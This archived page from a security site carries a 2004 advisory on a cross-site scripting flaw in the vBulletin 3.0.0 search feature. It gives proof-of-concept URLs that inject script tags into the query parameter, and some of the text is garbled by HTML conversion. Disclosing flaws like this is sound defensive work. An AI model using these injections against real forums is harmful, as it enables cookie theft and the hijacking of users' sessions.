Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: hack1000.htm

vBulletin PHP Forum Version



vBulletin PHP Forum Version

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software:        vBulletin PHP Forum Version
Vendor:           Jelsoft Enterprises Ltd
                        http://www.vbulletin.com 
Versions:        3.0.0 Release Candidate 4
Platforms:       Unix/Windows
Bug:                 Cross Site Scripting Vulnerabillity
Risk:                Low
Exploitation:   Remote with browser
Date:               24 Jan 2004
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com 
web:                http://theinsider.deep-ice.com 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Cross Site Scripting attacks are the most trusted evil urls when it concerns
to forums, because
forum messages are always long and contain many parameters.
vBulletin is a very trusted forum, it is considered to be a very safe and
security validated forum.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The Vulnerabillity is Cross Site Scripting. If an attacker will search the
following quert from the server:



OR in case you have problems:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa OR just reffer to <a href="http://<host>/forum/search.php?do=process&showposts=0&query=<sc">http://<host>/forum/search.php?do=process&showposts=0&query=<sc</a> ript>alert('X SS')</script> XSS appears and the server allows an attacker to inject & execute scripts. In the words of securityfocus.com : ~~~~~~~~~~~~~~~~~~~~~~~~~~ If all of these circumstances are met, an attacker may be able to exploit this issue via a malicious link containing arbitrary HTML and script code as part of the hostname. When the malicious link is clicked by an unsuspecting user, the attacker-supplied HTML and script code will be executed by their web client. This will occur because the server will echo back the malicious hostname supplied in the client's request, without sufficiently escaping HTML and script code. Attacks of this nature may make it possible for attackers to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== <a href="http://<host>/forum/search.php?do=process&showposts=0&query=<!--">http://<host>/forum/search.php?do=process&showposts=0&query=<!--</a> / main error message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>ale rt('XSS')</script><plaintext> <a href="http://<host>/forum/search.php?do=process&showposts=0&query=<sc">http://<host>/forum/search.php?do=process&showposts=0&query=<sc</a> ript>alert('X SS')</script> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- Rafel Ivgi, The-Insider <a href="http://theinsider.deep-ice.com">http://theinsider.deep-ice.com</a> "Things that are unlikeable, are NOT impossible." --------------------------------------------------------------------------- Ethical Hacking at InfoSec Institute. Mention this ad and get $720 off any course! All of our class sizes are guaranteed to be 10 students or less. We provide Ethical Hacking, Advanced Ethical Hacking, Intrusion Prevention, and many other technical hands on courses. Visit us at <a href="http://www.infosecinstitute.com/securityfocus">http://www.infosecinstitute.com/securityfocus</a> to get $720 off any course! ---------------------------------------------------------------------------- </b></font></pre></tt></body></html> <!-- google_ad_section_end --> <p><center> <br> <script type="text/javascript"><!-- google_ad_client = "pub-7461597152411296"; google_ad_width = 728; google_ad_height = 90; google_ad_format = "728x90_as"; google_ad_type = "text"; //2007-07-08: TUCoPS google_ad_channel = "2214400198"; google_color_border = "C3D9FF"; google_color_bg = "F8FFFF"; google_color_link = "003366"; google_color_text = "000000"; google_color_url = "009988"; google_ui_features = "rc:6"; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> <p> <iframe src="http://astore.amazon.com/aohstore-20" width="90%" height="1000" frameborder="0" scrolling="no"></iframe> <p> <p></center> <center><a href="/firefox.htm">TUCoPS is optimized to look best in Firefox&reg; on a widescreen monitor (1440x900 or better).</a></center> <font size=1><center>Site design & layout copyright &copy; 1986-2014 AOH</font> </center> <br><center><IMG SRC="http://artofhacking.com/cgi-bin/sc/sc.cgi?acct=tucops&font=payphone-med"></center> <p> </body> </html>